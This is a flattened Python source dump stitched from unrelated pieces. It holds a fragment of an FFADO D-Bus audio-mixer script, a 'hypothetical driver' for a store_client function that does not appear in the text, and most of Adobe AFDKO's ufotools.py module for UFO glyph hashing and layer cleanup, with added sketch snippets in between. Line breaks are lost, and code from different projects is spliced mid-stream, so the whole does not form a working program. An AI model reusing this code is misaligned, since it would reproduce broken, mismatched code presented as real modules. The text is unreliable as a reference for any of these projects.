'/org/ffado/Control/DeviceManager/001486089d5fa7e6/Mixer' discrete_interface='org.ffado.Control.Element.Discrete' continuous_interface='org.ffado.Control.Element.Continuous' mixer_interface='org.ffado.Control.Element.MatrixMixer' try: dbus.Interface(bus.get_object(dest, "%s/MonitorMute" % mixer_object), dbus_interface=mixer_interface) except dbus.DBusException, ex: subprocess.Popen(['ffado-dbus-server', '-v3']).pid time.sleep(2) 
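# --- Hypothetical driver (not from the original module) for the storage helpers
# above: a minimal RunControl-like object is enough for store_client to sync on
# entry, stage documents, and push on exit. URL and file names are made up.
from types import SimpleNamespace

rc = SimpleNamespace(
    storename=None,
    stores=[{"name": "docs", "url": "https://example.org/docs.git", "path": "docs"}],
    databases=[],
    builddir="_build",
    documents=["report.pdf"],
    force=False,
)

with store_client(rc) as sclient:       # sync() runs on entry, push() on exit
    for doc in rc.documents:
        print("staged at", sclient.copydoc(doc))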
monitor_mute = dbus.Interface( bus.get_object(dest, "%s/MonitorMute" % mixer_object), dbus_interface=mixer_interface) monitor_pan = dbus.Interface( bus.get_object(dest, "%s/MonitorPan" % mixer_object), dbus_interface=mixer_interface) outputs = []; for o in range(12): output = {} output['mute'] = dbus.Interface( bus.get_object(dest, "%s/OUT%dMute" % (mixer_object, o)), dbus_interface=discrete_interface) output['gain'] = dbus.Interface( bus.get_object(dest, "%s/OUT%dGain" % (mixer_object, o)), dbus_interface=continuous_interface) outputs.append(output) def set_mute(ins, outs, mute): if len(outs) == 2: if len(ins) == 1: ins.append(ins[0]) for x in range(2): monitor_mute.setValue(ins[x], outs[x], int(mute)) elif len(outs) == 1: pan = monitor_pan.getValue(ins[0], outs[0]) is_left = outs[0] % 2 == 0 if mute == is_left: # (mute and left) or not (mute or left) pan += 127 else: pan -= 127 if pan == 254: pan += 1; elif pan == 128: pan -= 1; for x in range(len(ins)): monitor_pan.setValue(ins[x], outs[0], pan) if mute == bool(pan == 127): for x in range(len(ins)): monitor_mute.setValue(ins[x], outs[0], mute) def connect(ins, outs): if connected(ins, outs): return set_mute(ins, outs, False) def disconnect(ins, outs): if not connected(ins, outs): return set_mute(ins, outs, True) def connected(ins, outs): assert 0 < len(ins) <= 2 assert 0 < len(outs) <= 2 if bool(monitor_mute.getValue(ins[0], outs[0])): # it's muted return False if len(outs) == 2: return True return monitor_pan.getValue(ins[0], outs[0]) != (1 - (outs[0] % 2)) * 255 # Copyright 2017 Adobe. All rights reserved. import ast import hashlib import os import re from collections import OrderedDict from fontPens.thresholdPen import ThresholdPen from fontTools.misc import etree as ET from fontTools.misc import plistlib from fontTools.pens.recordingPen import RecordingPen from fontTools.ufoLib import UFOReader from psautohint.ufoFont import norm_float from afdko import fdkutils __version__ = '1.35.2' __doc__ = """ ufotools.py v1.35.2 Jul 30 2020 Originally developed to work with 'bez' files and UFO fonts in support of the autohint tool, ufotools.py is now only used in checkoutlinesufo (since autohint has been dropped in favor of psautohint). Some references to "bez" and "autohint" remain in the tool its documentation. Users should *NOT* rely on long-term support of methods or classes within this module directly. It is intended for AFDKO-internal use and not as a general-purpose library outside of AFDKO. The basic model is: - read GLIF file - transform GLIF XML element to bez file - call FDK tool on bez file - transform new bez file to GLIF XML element with new data, and save in list After all glyphs are done save all the new GLIF XML elements to GLIF files, and update the hash map. A complication in the Adobe UFO workflow comes from the fact we want to make sure that checkoutlines and autohint have been run on each glyph in a UFO font, when building an OTF font from the UFO font. We need to run checkoutlines, because we no longer remove overlaps from source UFO font data, because this can make revising a glyph much easier. We need to run autohint, because the glyphs must be hinted after checkoutlines is run, and in any case we want all glyphs to have been autohinted. The problem with this is that it can take a minute or two to run autohint or checkoutlines on a 2K-glyph font. The way we avoid this is to make and keep a hash of the source glyph drawing operators for each tool. 
When the tool is run, it calculates a hash of the source glyph, and compares it to the saved hash. If these are the same, the tool can skip the glyph. This saves a lot of time: if checkoutlines and autohint are run on all glyphs in a font, then a second pass is under 2 seconds. Another issue is that since we no longer remove overlaps from the source glyph files, checkoutlines must write any edited glyph data to a different layer in order to not destroy the source data. The ufotools defines an Adobe-specific glyph layer for processed glyphs, named "glyphs.com.adobe.type.processedGlyphs". checkoutlines writes new glyph files to the processed glyphs layer only when it makes a change to the glyph data. When the autohint program is run, the ufotools must be able to tell whether checkoutlines has been run and has altered a glyph: if so, the input file needs to be from the processed glyph layer, else it needs to be from the default glyph layer. The way the hashmap works is that we keep an entry for every glyph that has been processed, identified by a hash of its marking path data. Each entry contains: - a hash of the glyph point coordinates, from the default layer. This is set after a program has been run. - a history list: a list of the names of each program that has been run, in order. - an editStatus flag. Altered GLIF data is always written to the Adobe processed glyph layer. The program may or may not have altered the outline data. For example, autohint adds private hint data, and adds names to points, but does not change any paths. If the stored hash for the glyph does not exist, the ufotools lib will save the new hash in the hash map entry and will set the history list to contain just the current program. The program will read the glyph from the default layer. If the stored hash matches the hash for the current glyph file in the default layer, and the current program name is in the history list,then ufotools will return "skip=1", and the calling program may skip the glyph. If the stored hash matches the hash for the current glyph file in the default layer, and the current program name is not in the history list, then the ufotools will return "skip=0". If the font object field 'usedProcessedLayer' is set True, the program will read the glyph from the from the Adobe processed layer, if it exists, else it will always read from the default layer. If the hash differs between the hash map entry and the current glyph in the default layer, and usedProcessedLayer is False, then ufotools will return "skip=0". If usedProcessedLayer is True, then the program will consult the list of required programs. If any of these are in the history list, then the program will report an error and return skip =1, else it will return skip=1. The program will then save the new hash in the hash map entry and reset the history list to contain just the current program. If the old and new hash match, but the program name is not in the history list, then the ufotools will not skip the glyph, and will add the program name to the history list. The only tools using this are, at the moment, checkoutlines, checkoutlinesufo and autohint. checkoutlines and checkoutlinesufo use the hash map to skip processing only when being used to edit glyphs, not when reporting them. checkoutlines necessarily flattens any components in the source glyph file to actual outlines. autohint adds point names, and saves the hint data as a private data in the new GLIF file. 
autohint saves the hint data in the GLIF private data area, /lib/dict, as a key and data pair. See below for the format. autohint started with _hintFormat1_, a reasonably compact XML representation of the data. In Sep 2105, autohhint switched to _hintFormat2_ in order to be plist compatible. This was necessary in order to be compatible with the UFO spec, by was driven more immediately by the fact the the UFO font file normalization tools stripped out the _hintFormat1_ hint data as invalid elements. """ _hintFormat1_ = """ Deprecated. See _hintFormat2_ below. A element identifies a specific point by its name, and describes a new set of stem hints which should be applied before the specific point. A element identifies a specific point by its name. The point is the first point of a curve. The presence of the element is a processing suggestion, that the curve and its successor curve should be converted to a flex operator. One challenge in applying the hintset and flex elements is that in the GLIF format, there is no explicit start and end operator: the first path operator is both the end and the start of the path. I have chosen to convert this to T1 by taking the first path operator, and making it a move-to. I then also use it as the last path operator. An exception is a line-to; in T1, this is omitted, as it is implied by the need to close the path. Hence, if a hintset references the first operator, there is a potential ambiguity: should it be applied before the T1 move-to, or before the final T1 path operator? The logic here applies it before the move-to only. ... ()* ()* * * * (* ( (positive integer)+ )+ )* * Example from "B" in SourceCodePro-Regular """ _hintFormat2_ = """ A element in the hintSetList array identifies a specific point by its name, and describes a new set of stem hints which should be applied before the specific point. A element in the flexList identifies a specific point by its name. The point is the first point of a curve. The presence of the element is a processing suggestion, that the curve and its successor curve should be converted to a flex operator. One challenge in applying the hintSetList and flexList elements is that in the GLIF format, there is no explicit start and end operator: the first path operator is both the end and the start of the path. I have chosen to convert this to T1 by taking the first path operator, and making it a move-to. I then also use it as the last path operator. An exception is a line-to; in T1, this is omitted, as it is implied by the need to close the path. Hence, if a hintset references the first operator, there is a potential ambiguity: should it be applied before the T1 move-to, or before the final T1 path operator? The logic here applies it before the move-to only. ... id hintSetList pointTag stems hstem * vstem * hstem3 ... * vstem3 ... 
* * flexList* + Example from "B" in SourceCodePro-Regular id 64bf4987f05ced2a50195f971cd924984047eb1d79c8c43e6a0054f59cc85dea23 a49deb20946a4ea84840534363f7a13cca31a81b1e7e33c832185173369086 hintSetList pointTag hintSet0000 stems hstem 338 28 hstem 632 28 hstem 100 32 hstem 496 32 pointTag hintSet0005 stems hstem 0 28 hstem 338 28 hstem 632 28 hstem 100 32 hstem 454 32 hstem 496 32 pointTag hintSet0016 stems hstem 0 28 hstem 338 28 hstem 632 28 hstem 100 32 hstem 496 32 """ # UFO names kDefaultGlyphsLayerName = "public.default" kDefaultGlyphsLayer = "glyphs" kProcessedGlyphsLayerName = "com.adobe.type.processedglyphs" kProcessedGlyphsLayer = "glyphs.%s" % kProcessedGlyphsLayerName DEFAULT_LAYER_ENTRY = [kDefaultGlyphsLayerName, kDefaultGlyphsLayer] PROCESSED_LAYER_ENTRY = [kProcessedGlyphsLayerName, kProcessedGlyphsLayer] kFontInfoName = "fontinfo.plist" kContentsName = "contents.plist" kLibName = "lib.plist" kPublicGlyphOrderKey = "public.glyphOrder" kAdobeDomainPrefix = "com.adobe.type" kAdobHashMapName = "%s.processedHashMap" % kAdobeDomainPrefix kAdobHashMapVersionName = "hashMapVersion" kAdobHashMapVersion = (1, 0) # If major version differs, do not use. kAutohintName = "autohint" kCheckOutlineName = "checkOutlines" kCheckOutlineNameUFO = "checkOutlines" kOutlinePattern = re.compile(r"", re.DOTALL) COMP_TRANSFORM = OrderedDict([ ('xScale', '1'), ('xyScale', '0'), ('yxScale', '0'), ('yScale', '1'), ('xOffset', '0'), ('yOffset', '0') ]) class UFOParseError(Exception): pass class UFOFontData(object): def __init__(self, parentPath, useHashMap, programName): self.parentPath = parentPath self.glyphMap = {} self.processedLayerGlyphMap = {} self.newGlyphMap = {} self.glyphList = [] self.fontInfo = None # If False, will skip reading hashmap and # testing to see if glyph can be skipped. # Should be used only when calling program is # running in report mode only, and not changing # any glyph data. self.useHashMap = useHashMap # Used to skip getting glyph data when glyph # hash matches hash of current glyph data. self.hashMap = {} self.fontDict = None self.programName = programName self.curSrcDir = None self.hashMapChanged = False self.glyphDefaultDir = os.path.join(self.parentPath, "glyphs") self.glyphLayerDir = os.path.join(self.parentPath, kProcessedGlyphsLayer) self.glyphWriteDir = self.glyphLayerDir self.historyList = [] self.requiredHistory = [] # See documentation above. # If False, then read data only from the default layer; # else read glyphs from processed layer, if it exists. self.useProcessedLayer = False # If True, then write data to the default layer self.writeToDefaultLayer = False # If True, then do not skip any glyphs. self.doAll = False # track whether checkSkipGLyph has deleted an # out-of-date glyph from the processed glyph layer self.deletedGlyph = False # If true, do NOT round x,y values when processing self.allowDecimalCoords = False self.glyphSet = UFOReader(self.parentPath, validate=False).getGlyphSet(None) def getGlyphMap(self): if len(self.glyphMap) == 0: self.loadGlyphMap() return self.glyphMap def readHashMap(self): hashPath = os.path.join(self.parentPath, "data", kAdobHashMapName) if os.path.exists(hashPath): with open(hashPath, "r", encoding='utf-8') as fp: data = fp.read() newMap = ast.literal_eval(data) else: newMap = {kAdobHashMapVersionName: kAdobHashMapVersion} try: version = newMap[kAdobHashMapVersionName] if version[0] > kAdobHashMapVersion[0]: raise UFOParseError("Hash map version is newer than program. 
" "Please update the FDK") elif version[0] < kAdobHashMapVersion[0]: print("Updating hash map: was older version") newMap = {kAdobHashMapVersionName: kAdobHashMapVersion} except KeyError: print("Updating hash map: was older version") newMap = {kAdobHashMapVersionName: kAdobHashMapVersion} self.hashMap = newMap def writeHashMap(self): hashMap = self.hashMap if len(hashMap) == 0: return # no glyphs were processed. hashDir = os.path.join(self.parentPath, "data") if not os.path.exists(hashDir): os.makedirs(hashDir) hashPath = os.path.join(hashDir, kAdobHashMapName) hasMapKeys = sorted(hashMap.keys()) data = ["{"] for gName in hasMapKeys: data.append("'%s': %s," % (gName, hashMap[gName])) data.append("}") data.append("") data = '\n'.join(data) with open(hashPath, "w") as fp: fp.write(data) def getGlyphSrcPath(self, glyphName): if len(self.glyphMap) == 0: self.loadGlyphMap() glyphFileName = self.glyphMap[glyphName] # Try for processed layer first if self.useProcessedLayer and self.processedLayerGlyphMap: try: glyphFileName = self.processedLayerGlyphMap[glyphName] self.curSrcDir = self.glyphLayerDir glyphPath = os.path.join(self.glyphLayerDir, glyphFileName) if os.path.exists(glyphPath): return glyphPath except KeyError: pass self.curSrcDir = self.glyphDefaultDir glyphPath = os.path.join(self.curSrcDir, glyphFileName) return glyphPath def getGlyphDefaultPath(self, glyphName): if len(self.glyphMap) == 0: self.loadGlyphMap() glyphFileName = self.glyphMap[glyphName] glyphPath = os.path.join(self.glyphDefaultDir, glyphFileName) return glyphPath def getGlyphProcessedPath(self, glyphName): if len(self.glyphMap) == 0: self.loadGlyphMap() if not self.processedLayerGlyphMap: return None try: glyphFileName = self.processedLayerGlyphMap[glyphName] glyphPath = os.path.join(self.glyphLayerDir, glyphFileName) except KeyError: glyphPath = None return glyphPath def checkSkipGlyph(self, glyphName, newSrcHash, doAll): skip = False if not self.useHashMap: return skip if len(self.hashMap) == 0: # Hash maps have not yet been read in. Get them. self.readHashMap() hashEntry = srcHash = None historyList = [] programHistoryIndex = -1 # not found in historyList # Get hash entry for glyph try: hashEntry = self.hashMap[glyphName] srcHash, historyList = hashEntry try: programHistoryIndex = historyList.index(self.programName) except ValueError: pass except KeyError: # Glyph is as yet untouched by any program. pass if (srcHash == newSrcHash): if (programHistoryIndex >= 0): # The glyph has already been processed by this program, # and there have been no changes since. skip = True and (not doAll) if not skip: # case for Checkoutlines if not self.useProcessedLayer: self.hashMapChanged = True self.hashMap[glyphName] = [newSrcHash, [self.programName]] glyphPath = self.getGlyphProcessedPath(glyphName) if glyphPath and os.path.exists(glyphPath): os.remove(glyphPath) else: if (programHistoryIndex < 0): historyList.append(self.programName) else: # case for autohint if self.useProcessedLayer: # Default layer glyph and stored glyph hash differ, and # useProcessedLayer is True. If any of the programs in # requiredHistory in are in the historyList, we need to # complain and skip. foundMatch = False if len(historyList) > 0: for programName in self.requiredHistory: if programName in historyList: foundMatch = True if foundMatch: print("Error. Glyph '%s' has been edited. You must first " "run '%s' before running '%s'. Skipping." 
% (glyphName, self.requiredHistory, self.programName)) skip = True # If the source hash has changed, we need to # delete the processed layer glyph. self.hashMapChanged = True self.hashMap[glyphName] = [newSrcHash, [self.programName]] glyphPath = self.getGlyphProcessedPath(glyphName) if glyphPath and os.path.exists(glyphPath): os.remove(glyphPath) self.deletedGlyph = True return skip @staticmethod def getGlyphXML(glyphDir, glyphFileName): glyphPath = os.path.join(glyphDir, glyphFileName) # default etRoot = ET.ElementTree() glifXML = etRoot.parse(glyphPath) outlineXML = glifXML.find("outline") try: widthXML = glifXML.find("advance") if widthXML is not None: width = round(ast.literal_eval(widthXML.get("width", '0')), 9) else: width = 0 except UFOParseError as e: print(f"Error. skipping glyph '{glyphFileName}' because " f"of parse error: {str(e)}") return None, None, None return width, glifXML, outlineXML def getOrSkipGlyph(self, glyphName, doAll=0): # Get default glyph layer data, so we can check if the glyph # has been edited since this program was last run. # If the program name is in the history list, and the srcHash # matches the default glyph layer data, we can skip. if len(self.glyphMap) == 0: self.loadGlyphMap() glyphFileName = self.glyphMap.get(glyphName) if not glyphFileName: return None, True # skip width, glifXML, outlineXML = self.getGlyphXML(self.glyphDefaultDir, glyphFileName) if glifXML is None: return None, True # skip # Hash is always from the default glyph layer. useDefaultGlyphDir = True newHash, _ = self.buildGlyphHashValue( width, outlineXML, glyphName, useDefaultGlyphDir) skip = self.checkSkipGlyph(glyphName, newHash, doAll) # If self.useProcessedLayer and there is a glyph in the # processed layer, get the outline from that. if self.useProcessedLayer and self.processedLayerGlyphMap: try: glyphFileName = self.processedLayerGlyphMap[glyphName] except KeyError: pass glyphPath = os.path.join(self.glyphLayerDir, glyphFileName) if os.path.exists(glyphPath): width, glifXML, _ = self.getGlyphXML( self.glyphLayerDir, glyphFileName) if glifXML is None: return None, True # skip return width, skip def loadGlyphMap(self): # Need to both get the list of glyphs from contents.plist, and also # the glyph order. The latter is take from the public.glyphOrder key # in lib.plist, if it exists, else it is taken from the contents.plist # file. Any glyphs in contents.plist which are not named in the # public.glyphOrder are sorted after all glyphs which are named in the # public.glyphOrder,, in the order that they occured in contents.plist. contentsPath = os.path.join(self.parentPath, "glyphs", kContentsName) self.glyphMap, self.glyphList = parsePList(contentsPath) orderPath = os.path.join(self.parentPath, kLibName) self.orderMap = parseGlyphOrder(orderPath) if self.orderMap is not None: orderIndex = len(self.orderMap) orderList = [] # If there are glyphs in the font which are not named in the # public.glyphOrder entry, add then in the order of the # contents.plist file. 
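# --- Illustrative sketch (not from ufotools) of the on-disk format produced by
# writeHashMap and read back by readHashMap above: a Python literal dict parsed
# with ast.literal_eval. Glyph names, hashes and history lists here are made up.
import ast

hash_map = {
    "hashMapVersion": (1, 0),
    "A": ["1af3c0ffee", ["checkOutlines", "autohint"]],   # src hash + program history
    "B": ["9c0e5eed00", ["checkOutlines"]],
}
lines = ["{"]
for name in sorted(hash_map):
    lines.append("'%s': %s," % (name, hash_map[name]))
lines.append("}")
text = "\n".join(lines)
assert ast.literal_eval(text) == hash_map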
for glyphName in self.glyphList: try: entry = [self.orderMap[glyphName], glyphName] except KeyError: entry = [orderIndex, glyphName] self.orderMap[glyphName] = orderIndex orderIndex += 1 orderList.append(entry) orderList.sort() self.glyphList = [] for entry in orderList: self.glyphList.append(entry[1]) else: self.orderMap = {} numGlyphs = len(self.glyphList) for i in range(numGlyphs): self.orderMap[self.glyphList[i]] = i # We also need to get the glyph map for the processed layer, # and use this when the glyph is read from the processed layer. # Because checkoutlinesufo used the defcon library, it can write # glyph file names that differ from what is in the default glyph layer. contentsPath = os.path.join(self.glyphLayerDir, kContentsName) if os.path.exists(contentsPath): self.processedLayerGlyphMap, self.processedLayerGlyphList = \ parsePList(contentsPath) @staticmethod def _rd_val(str_val): """Round and normalize a (string) GLIF value""" return repr(norm_float(round(ast.literal_eval(str_val), 9))) def buildGlyphHashValue(self, width, outlineXML, glyphName, useDefaultGlyphDir, level=0): """ glyphData must be the official XML from a GLIF. We skip contours with only one point. """ dataList = ["w%s" % norm_float(round(width, 9))] if level > 10: raise UFOParseError( "In parsing component, exceeded 10 levels of reference. " "'%s'. " % (glyphName)) # tag is optional per spec., e.g. space glyph # does not necessarily have it. if outlineXML is not None: for childContour in outlineXML: if childContour.tag == "contour": if len(childContour) < 2: continue for child in childContour: if child.tag == "point": ptType = child.get("type") pointType = '' if ptType is None else ptType[0] x = self._rd_val(child.get("x")) y = self._rd_val(child.get("y")) dataList.append("%s%s%s" % (pointType, x, y)) elif childContour.tag == "component": # append the component hash. compGlyphName = childContour.get("base") if compGlyphName is None: raise UFOParseError( "'%s' is missing the 'base' attribute in a " "component." % glyphName) dataList.append("%s%s" % ("base:", compGlyphName)) if useDefaultGlyphDir: try: componentPath = self.getGlyphDefaultPath( compGlyphName) except KeyError: raise UFOParseError( "'%s' component glyph is missing from " "contents.plist." % (compGlyphName)) else: # If we are not necessarily using the default layer # for the main glyph, then a missing component may not # have been processed, and may just be in the default # layer. We need to look for component glyphs in the # src list first, then in the defualt layer. try: componentPath = self.getGlyphSrcPath(compGlyphName) if not os.path.exists(componentPath): componentPath = self.getGlyphDefaultPath( compGlyphName) except KeyError: try: componentPath = self.getGlyphDefaultPath( compGlyphName) except KeyError: raise UFOParseError( "'%s' component glyph is missing from " "contents.plist." % (compGlyphName)) if not os.path.exists(componentPath): raise UFOParseError( "'%s' component file is missing: '%s'." 
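# --- Stand-alone sketch (not from ufotools) of the ordering rule in loadGlyphMap
# above: glyphs named in public.glyphOrder keep that order, anything else is
# appended in contents.plist order. Glyph names are illustrative.
order_map = {"A": 0, "B": 1, "space": 2}                      # from lib.plist
contents_order = ["B", "A", "Adieresis", "space", "Zcaron"]   # from contents.plist

order_index = len(order_map)
entries = []
for name in contents_order:
    if name not in order_map:
        order_map[name] = order_index
        order_index += 1
    entries.append((order_map[name], name))
print([name for _, name in sorted(entries)])
# -> ['A', 'B', 'space', 'Adieresis', 'Zcaron']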
% (compGlyphName, componentPath)) etRoot = ET.ElementTree() # Collect transform values for trans_key, flbk_val in COMP_TRANSFORM.items(): value = childContour.get(trans_key, flbk_val) dataList.append(self._rd_val(value)) componentXML = etRoot.parse(componentPath) componentOutlineXML = componentXML.find("outline") _, componentDataList = self.buildGlyphHashValue( width, componentOutlineXML, glyphName, useDefaultGlyphDir, level + 1) dataList.extend(componentDataList) data = "".join(dataList) if len(data) >= 128: data = hashlib.sha512(data.encode("ascii")).hexdigest() return data, dataList def close(self): if self.hashMapChanged: self.writeHashMap() self.hashMapChanged = False def parseGlyphOrder(filePath): orderMap = None if os.path.exists(filePath): publicOrderDict, _ = parsePList(filePath, kPublicGlyphOrderKey) if publicOrderDict is not None: orderMap = {} glyphList = publicOrderDict[kPublicGlyphOrderKey] numGlyphs = len(glyphList) for i in range(numGlyphs): orderMap[glyphList[i]] = i return orderMap def parsePList(filePath, dictKey=None): # If dictKey is defined, parse and return only the data for that key. # # Updates July 2019: # - use fontTools.misc.plistlib instead of ET to parse # - use built-in OrderedDict as the dict_type to preserve ordering # - use simpler filtering for non-None dictKey plistDict = {} plistKeys = [] with open(filePath, 'r', encoding='utf-8') as fp: plistDict = plistlib.load(fp, dict_type=OrderedDict) if dictKey is not None: if dictKey in plistDict: plistDict = {dictKey: plistDict[dictKey]} else: plistDict = None if plistDict is not None: plistKeys = list(plistDict.keys()) return plistDict, plistKeys def addWhiteSpace(parent, level): child = None childIndent = '\n' + (" " * (level + 1)) prentIndent = '\n' + (" " * (level)) # print("parent Tag", parent.tag, repr(parent.text), repr(parent.tail)) for child in parent: child.tail = childIndent addWhiteSpace(child, level + 1) if child is not None: if parent.text is None: parent.text = childIndent child.tail = prentIndent # print("lastChild Tag", child.tag, repr(child.text), # repr(child.tail), "parent Tag", parent.tag) def regenerate_glyph_hashes(ufo_font_data): """ The handling of the glyph hashes is super convoluted. This method fixes https://github.com/adobe-type-tools/afdko/issues/349 """ for gname, gfilename in ufo_font_data.getGlyphMap().items(): gwidth, _, outline_xml = ufo_font_data.getGlyphXML( ufo_font_data.glyphDefaultDir, gfilename) hash_entry = ufo_font_data.hashMap.get(gname, None) if not hash_entry: continue ghash, _ = ufo_font_data.buildGlyphHashValue( gwidth, outline_xml, gname, True) hash_entry[0] = ghash def checkHashMaps(fontPath, doSync): """ Checks if the hashes of the glyphs in the default layer match the hash values stored in the UFO's 'data/com.adobe.type.processedHashMap' file. Returns a tuple of a boolean and a list. The boolean is True if all glyph hashes matched. The list contains strings that report the glyph names whose hash did not match. If doSync is True, it will delete any glyph in the processed glyph layer directory which does not have a matching glyph in the default layer, or whose source glyph hash does not match. It will then update the contents.plist file for the processed glyph layer, and delete the program specific hash maps. """ msgList = [] allMatch = True ufoFontData = UFOFontData(fontPath, True, '') ufoFontData.readHashMap() # Don't need to check the glyph hashes if there aren't any. 
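# --- Illustrative sketch (not from ufotools) of how buildGlyphHashValue above
# collapses the concatenated width/point tokens: once the string reaches 128
# characters it is replaced by its SHA-512 hex digest. Point data is made up.
import hashlib

data_list = ["w600"] + ["l%s%s" % (x, y) for x, y in
             [(10, 0), (10, 700), (90, 700), (90, 0)] * 10]
data = "".join(data_list)
if len(data) >= 128:
    data = hashlib.sha512(data.encode("ascii")).hexdigest()
print(len(data), data[:16])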
if not ufoFontData.hashMap: return allMatch, msgList for glyphName, glyphFileName in ufoFontData.getGlyphMap().items(): hash_entry = ufoFontData.hashMap.get(glyphName, None) if not hash_entry: continue else: oldHash = hash_entry[0] width, _, outlineXML = ufoFontData.getGlyphXML( ufoFontData.glyphDefaultDir, glyphFileName) if outlineXML is None: continue newHash, _ = ufoFontData.buildGlyphHashValue( width, outlineXML, glyphName, True) if oldHash != newHash: allMatch = False if len(msgList) < 10: msgList.append("Glyph %s seems to have been modified since " "last time checkoutlinesufo processed this " "font." % glyphName) elif len(msgList) == 10: msgList.append("(additional messages omitted)") if doSync: fileList = os.listdir(ufoFontData.glyphWriteDir) fileList = filter(lambda fileName: fileName.endswith(".glif"), fileList) # invert glyphMap fileMap = {} for glyphName, fileName in ufoFontData.glyphMap.items(): fileMap[fileName] = glyphName for fileName in fileList: if fileName in fileMap and ( fileMap[fileName] in ufoFontData.hashMap): continue # Either not in glyphMap, or not in hashMap. Exterminate. try: glyphPath = os.path.join(ufoFontData.glyphWriteDir, fileName) os.remove(glyphPath) print("Removed outdated file: %s" % glyphPath) except OSError: print("Cannot delete outdated file: %s" % glyphPath) return allMatch, msgList kAdobeLCALtSuffix = ".adobe.lc.altsuffix" def cleanUpGLIFFiles(defaultContentsFilePath, glyphDirPath, doWarning=True): changed = 0 contentsFilePath = os.path.join(glyphDirPath, kContentsName) # maps glyph names to files. with open(contentsFilePath, 'r', encoding='utf-8') as fp: contentsDict = plistlib.load(fp) # First, delete glyph files that are not in the contents.plist file in # the glyphDirPath. In some UFOfont files, we end up with case errors, # so we need to check for a lower-case version of the file name. fileDict = {} for glyphName, fileName in contentsDict.items(): fileDict[fileName] = glyphName lcFileName = fileName.lower() if lcFileName != fileName: fileDict[lcFileName + kAdobeLCALtSuffix] = glyphName fileList = os.listdir(glyphDirPath) for fileName in fileList: if not fileName.endswith(".glif"): continue if fileName in fileDict: continue lcFileName = fileName.lower() if (lcFileName + kAdobeLCALtSuffix) in fileDict: # glif file exists which has a case-insensitive match to file name # entry in the contents.plist file; assume latter is intended, and # change the file name to match. glyphFilePathOld = os.path.join(glyphDirPath, fileName) glyphFilePathNew = os.path.join(glyphDirPath, lcFileName) os.rename(glyphFilePathOld, glyphFilePathNew) continue glyphFilePath = os.path.join(glyphDirPath, fileName) os.remove(glyphFilePath) if doWarning: print("Removing glif file %s that was not in the contents.plist " "file: %s" % (glyphDirPath, contentsFilePath)) changed = 1 if defaultContentsFilePath == contentsFilePath: return changed # Now remove glyphs that are not referenced in the defaultContentsFilePath. # Since the processed glyph layer is written with the defcon module, # and the default layer may be written by anything, the actual glyph file # names may be different for the same UFO glyph. We need to compare by UFO # glyph name, not file name. 
with open(defaultContentsFilePath, 'r', encoding='utf-8') as fp: defaultContentsDict = plistlib.load(fp) fileList = os.listdir(glyphDirPath) for fileName in fileList: if not fileName.endswith(".glif"): continue try: glyphName = fileDict[fileName] if glyphName not in defaultContentsDict: glyphFilePath = os.path.join(glyphDirPath, fileName) os.remove(glyphFilePath) if doWarning: print("Removing glif %s that was not in the " "contents.plist file: %s" % ( glyphName, defaultContentsFilePath)) changed = 1 except KeyError: print("Shouldn't happen %s %s" % ( glyphName, defaultContentsFilePath)) return changed def cleanupContentsList(glyphDirPath, doWarning=True): contentsFilePath = os.path.join(glyphDirPath, kContentsName) # maps glyph names to files. with open(contentsFilePath, 'r', encoding='utf-8') as fp: contentsDict = plistlib.load(fp) fileDict = {} fileList = os.listdir(glyphDirPath) for fileName in fileList: fileDict[fileName] = 1 changed = 0 # now update and write the processed processedGlyphDirPath # contents.plist file. itemList = list(contentsDict.items()) for glyphName, fileName in itemList: if fileName not in fileDict: del contentsDict[glyphName] changed = 1 if doWarning: print("Removing contents.plist entry where glif was missing: " "%s, %s, %s" % (glyphName, fileName, glyphDirPath)) if changed: with open(contentsFilePath, 'wb') as fp: plistlib.dump(contentsDict, fp) def validateLayers(ufoFontPath, doWarning=True): # Read glyphs/contents.plist file. # Delete any glyphs on /glyphs or /processed glyphs which are not in # glyphs/contents.plist file. Delete any entries in the contents.plist # file which are not in the glyph files. Filter contents list with what's # in /processed glyphs: write to process/plist file.' The most common way # that this is needed in the AFDKO workflow is if someone kills # checkoutlines/checkoutlinesufo or autohint while it is running. Since # the program may delete glyphs from the processed layer while running, # and the contents.plist file is updated only when the changed font is # saved, the contents.plist file in the processed layer ends up referencing # glyphs that aren't there anymore. You can also get extra glyphs not in # the contents.plist file by several editing workflows. # First, clean up the default layer. glyphDirPath = os.path.join(ufoFontPath, "glyphs") defaultContentsFilePath = os.path.join( ufoFontPath, "glyphs", kContentsName) # Happens when called on a font which is not a UFO font. if not os.path.exists(defaultContentsFilePath): return # remove glif files not in contents.plist cleanUpGLIFFiles(defaultContentsFilePath, glyphDirPath, doWarning) # remove entries for glif files that don't exist cleanupContentsList(glyphDirPath, doWarning) # now for the processed dir. glyphDirPath = os.path.join(ufoFontPath, kProcessedGlyphsLayer) if not os.path.exists(glyphDirPath): return # Remove any glif files that are not in both the processed glif directory # contents.plist file and the default contents .plist file. # This will happen pretty often, as glif files are deleted from the # processed glyph layer is their hash differs from the current hash for # the glyph in the default layer. 
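# --- Stand-alone sketch (not from ufotools) of the cleanupContentsList idea above:
# drop contents.plist entries whose .glif file no longer exists. Uses the standard
# library plistlib; the UFO path is illustrative.
import os
import plistlib

glyph_dir = "MyFont.ufo/glyphs"
contents_path = os.path.join(glyph_dir, "contents.plist")

with open(contents_path, "rb") as fp:
    contents = plistlib.load(fp)

present = set(os.listdir(glyph_dir))
stale = [name for name, fname in contents.items() if fname not in present]
for name in stale:
    print("Removing contents.plist entry where glif was missing:", name)
    del contents[name]

if stale:
    with open(contents_path, "wb") as fp:
        plistlib.dump(contents, fp)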
